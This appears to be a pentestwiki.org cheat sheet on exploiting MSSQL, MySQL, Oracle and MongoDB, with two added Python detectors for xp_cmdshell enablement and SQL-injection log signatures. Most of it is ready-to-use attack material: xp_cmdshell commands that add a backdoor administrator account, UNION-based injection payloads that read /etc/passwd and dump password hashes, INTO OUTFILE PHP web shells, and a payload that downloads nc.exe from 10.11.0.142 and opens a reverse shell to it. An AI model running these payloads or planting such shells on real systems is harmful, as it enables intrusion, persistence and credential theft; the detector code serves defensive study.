SQL Exploitation

From pentestwiki.org

Exploitation MSSQL

$sqsh -S $IP -U sa -P $PASSWORD


$sqlcmd -S localhost -U SA -P $PASSWORD



MSSQL xp_cmdshell

Execute commands:

$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP


Planting a backdoor account:

$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user jack [email protected] /add" $IP
$nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net localgroup Administrators jack /add" $IP


Queries:

xp_cmdshell 'whoami.exe'
master..xp_cmdshell 'dir c:\'
exec xp_cmdshell 'whoami.exe'
exec master.dbo.xp_cmdshell 'osql -E -Sserver1 -i c:\temp\nightly.sql'
EXEC master..xp_cmdshell 'dir *.exe'
xp_cmdshell 'dir *.exe';
DECLARE @cmd sysname, @var sysname;
SET @var = 'Hello world';
SET @cmd = 'echo ' + @var + ' > var_out.txt';
EXEC master..xp_cmdshell @cmd;

Queries

SELECT name FROM sysusers WHERE name = USER_NAME();
SELECT HOST_NAME(), USER_NAME(), SYSTEM_USER, @@VERSION, @@SERVERNAME, @@LANGUAGE
SELECT DB_NAME()
Execute spFileDetails 'c:\autoexec.bat'                 -- custom stored procedure, only if present
Select dbo.ufsReadfileAsString ('MyPath','MyFileName')  -- custom function, only if present
EXEC xp_cmdshell 'dir *.exe'
EXEC master..xp_msver 'ProductVersion'                  -- xp_msver is a procedure, not a column
EXEC master..xp_msver 'WindowsVersion'
SELECT CURRENT_USER
WAITFOR DELAY '00:00:20'                                -- T-SQL time delay (there is no WAIT_FOR function)

List SQL users:

select * from master.sys.server_principals

HOW TO ENABLE XP_CMDSHELL

-- To allow advanced options to be changed.  
EXEC sp_configure 'show advanced options', 1;  
GO  
-- To update the currently configured value for advanced options.  
RECONFIGURE;  
GO  
-- To enable the feature.  
EXEC sp_configure 'xp_cmdshell', 1;  
GO  
-- To update the currently configured value for this feature.  
RECONFIGURE;  
GO  
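The enable sequence above leaves a trace: after each sp_configure call SQL Server writes a "Configuration option '...' changed from X to Y" line to its ERRORLOG. The following detector, added here as an example and not taken from pentestwiki.org, parses such lines and flags the two-step pattern (show advanced options on, then xp_cmdshell on from the same session). The ERRORLOG excerpt, the spid values and the five-minute window are constructed sample data and assumptions, not values from this page.

```python
import re
from datetime import datetime, timedelta
from dataclasses import dataclass

# Constructed SQL Server ERRORLOG excerpt (sample data, not from a real server).
# Lines follow the format SQL Server writes after sp_configure + RECONFIGURE.
SAMPLE_ERRORLOG = """\
2024-03-01 09:12:01.45 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 09:12:01.52 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 09:30:44.10 spid60      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-03-01 10:01:02.00 spid52      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement hands OS-level or remote capabilities to SQL logins.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}
GATE_OPTION = "show advanced options"  # has to be switched on first, as the procedure above shows


@dataclass
class ConfigChange:
    when: datetime
    spid: str
    option: str
    old: int
    new: int

    def turns_on(self, name: str) -> bool:
        """True when this line switches the named option from off to on."""
        return self.option == name and self.old == 0 and self.new != 0


def parse_config_changes(text: str):
    """Parse 'Configuration option ... changed' lines into ConfigChange records."""
    out = []
    for line in text.splitlines():
        m = CONFIG_CHANGE_RE.match(line)
        if not m:
            continue
        out.append(ConfigChange(
            when=datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            spid=m["spid"], option=m["option"], old=int(m["old"]), new=int(m["new"]),
        ))
    return out


def watched_enablements(text: str):
    """Every line that switches a watched option from off to on (disables are ignored)."""
    return [c for c in parse_config_changes(text) if any(c.turns_on(o) for o in WATCHED_OPTIONS)]


def enable_sequences(text: str, window=timedelta(minutes=5)):
    """Pair a 'show advanced options' enable with a watched-option enable from the
    same session (spid) inside the window: the exact sequence of the procedure above."""
    changes = parse_config_changes(text)
    gates = [c for c in changes if c.turns_on(GATE_OPTION)]
    found = []
    for c in changes:
        if not any(c.turns_on(o) for o in WATCHED_OPTIONS):
            continue
        for g in gates:
            if g.spid == c.spid and timedelta(0) <= c.when - g.when <= window:
                found.append((g, c))
                break
    return found


if __name__ == "__main__":
    for gate, enable in enable_sequences(SAMPLE_ERRORLOG):
        print(f"{enable.spid}: '{gate.option}' then '{enable.option}' enabled at {enable.when}")
```

Feeding the real ERRORLOG (or the same messages as collected by an agent) through enable_sequences gives a low-noise alert: the gate option is rarely toggled in normal operation, and the pairing with a watched option from one spid is what distinguishes the procedure above from a DBA tuning an unrelated setting such as max degree of parallelism.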

SQL Exploitation (SQLi) MySQL (raw queries)

345 order by 7
en' order by 7 -- 
345 and sleep(5)
en/**/and/**/sleep(5)
en'/**/and/**/sleep(5)-- 
734 union all select 1,@@version,3,4,table_name,6 from information_schema.tables
734 union all select 1,@@version,3,4,column_name,6 from information_schema.columns where table_name="users"
734 union select 1,2,3,4,concat(Host, " / ", User," / ", Password),6 from mysql.user
734 union all select 1,2,3,4,5,load_file('/etc/passwd') 
734 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']); ?>",6 into outfile 'c:/xampp/htdocs/backdoor.php'
734 union all select 1,2,3,4,"<?php $filename='C:/xampp/htdocs/nc.exe'; $download='http://10.11.0.142/nc.exe'; file_put_contents($filename,file_get_contents($download)); system('C:/xampp/htdocs/nc.exe -e cmd.exe 10.11.0.142 443'); ?>",6 into outfile 'c:/xampp/htdocs/backdoor3.php'
en' union select 1,2,3,4,"<?php $filename='nc.exe'; $download='http://10.11.0.142/nc.exe'; file_put_contents($filename,file_get_contents($download)); system('nc.exe -e cmd.exe 10.11.0.142 443'); ?>",6 into outfile 'c:/xampp/htdocs/backdoor-post.php' -- 
SHOW DATABASES, SHOW SCHEMAS and SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA are equivalent ways to list databases.
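Each of the raw queries above lands in the web server's access log, URL-encoded, before it reaches MySQL. The scanner below is an added example (not code from pentestwiki.org) that decodes request targets, collapses the /**/ comment spacing trick so the query looks the way the database parser sees it, and tags each request with the technique it matches: ORDER BY column counting, sleep() timing, UNION SELECT, information_schema enumeration, load_file() reads and INTO OUTFILE writes. The Apache combined-log lines, the IP addresses and the signature names are constructed sample data and assumptions, not values from this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (sample data, not from a real server). The
# injected parameters mirror the raw queries above, URL-encoded as a browser sends them.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [01/Mar/2024:10:00:01 +0000] "GET /item.php?id=345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:05 +0000] "GET /item.php?id=345%20order%20by%207 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:09 +0000] "GET /item.php?id=345%20and%20sleep(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:15 +0000] "GET /item.php?lang=en'/**/and/**/sleep(5)--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:20 +0000] "GET /item.php?id=734%20union%20all%20select%201,@@version,3,4,table_name,6%20from%20information_schema.tables HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:31 +0000] "GET /item.php?id=734%20union%20all%20select%201,2,3,4,5,load_file('/etc/passwd') HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2024:10:00:40 +0000] "GET /item.php?id=734%20union%20all%20select%201,2,3,4,%22x%22,6%20into%20outfile%20'c:/xampp/htdocs/b.php' HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Mar/2024:10:01:00 +0000] "GET /search.php?q=order+books+by+author HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature name -> pattern, run against the decoded, comment-collapsed, lower-cased target.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "comment_terminator": re.compile(r"--\s"),
}
INLINE_COMMENT_RE = re.compile(r"/\*.*?\*/")


def normalize(target):
    """URL-decode the request target and replace /**/ comments with spaces, which is
    how MySQL's parser treats them. Also report whether any inline comment was present,
    since that spacing trick is itself a signal."""
    decoded = unquote_plus(target)
    had_comment = INLINE_COMMENT_RE.search(decoded) is not None
    return INLINE_COMMENT_RE.sub(" ", decoded).lower(), had_comment


def scan_access_log(text):
    """Return one finding per request that matches at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        normalized, had_comment = normalize(m["target"])
        hits = {name for name, rx in SIGNATURES.items() if rx.search(normalized)}
        if had_comment:
            hits.add("inline_comment")
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "target": m["target"], "signatures": hits})
    return findings


def hits_by_client(findings):
    """Count flagged requests per source address, to surface a client working through the list."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["ip"], f["ts"], sorted(f["signatures"]), f["target"])
    print(hits_by_client(SAMPLE_ACCESS_LOG and scan_access_log(SAMPLE_ACCESS_LOG)))
```

The order_by_probe pattern insists on a number after "order by", so the benign search for "order books by author" is not flagged; in practice the sequence of signatures from one address (column counting, then timing, then UNION, then file access) is more telling than any single hit, which is what hits_by_client is there to surface.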

Exploitation Oracle

Testing connection:

$cat $ORACLE_HOME/network/admin/tnsnames.ora
$cat $TNSADMIN


if set up:

$tnsping net_service_name count


Connecting into the database:

Syntax:

$/usr/lib/oracle/12.2/client64/bin/sqlplus <USERNAME>/<PASSWORD>@<HOSTNAME>/<SERVICE_NAME>
$sqlplus sys/<your password>@//localhost:1521/<your SID> as sysdba
$sqlplus system/<your password>@//localhost:1521/<your SID>


For SSL connections:

$cat $ORACLE_HOME/network/admin/sqlnet.ora
$sqlplus -L [email protected]<SERVICE NAME>
$sqlplus -L $USER/[email protected]$SERVICE


Queries:

SELECT NAME, FILE#, STATUS, CHECKPOINT_CHANGE# "CHECKPOINT" FROM V$DATAFILE
SELECT sysdate FROM dual
SELECT * FROM PRODUCT_COMPONENT_VERSION; -- Show versions
SELECT table_name FROM all_tables; -- Show tables
SELECT owner, table_name FROM all_tables;
SELECT user FROM dual; -- Show current user
SELECT * FROM <TABLE> FETCH FIRST 10 ROWS ONLY; -- LIMIT 10 (Oracle 12c and later)
SELECT DISTINCT OWNER FROM ALL_OBJECTS; -- Show users (object owners)
SELECT TABLESPACE_NAME FROM USER_TABLESPACES; -- List tablespaces

-- Use the following SQL to find the entire list of objects you have access to
SELECT * FROM all_tab_privs;

SELECT USERNAME,PASSWORD_VERSIONS FROM SYS.DBA_USERS;

Connection checker (when no sqlplus): https://github.com/aimtiaz11/oracle-jdbc-tester


TNS Poison vulnerability


Exploitation MongoDB

Ports 3000, 27017, 28017

$nmap --script=mongodb-brute $IP


$nmap --script=mongodb-databases $IP


$mongo --port <PORT> -u $USER -p $PASS $IP


$nosqlmap $IP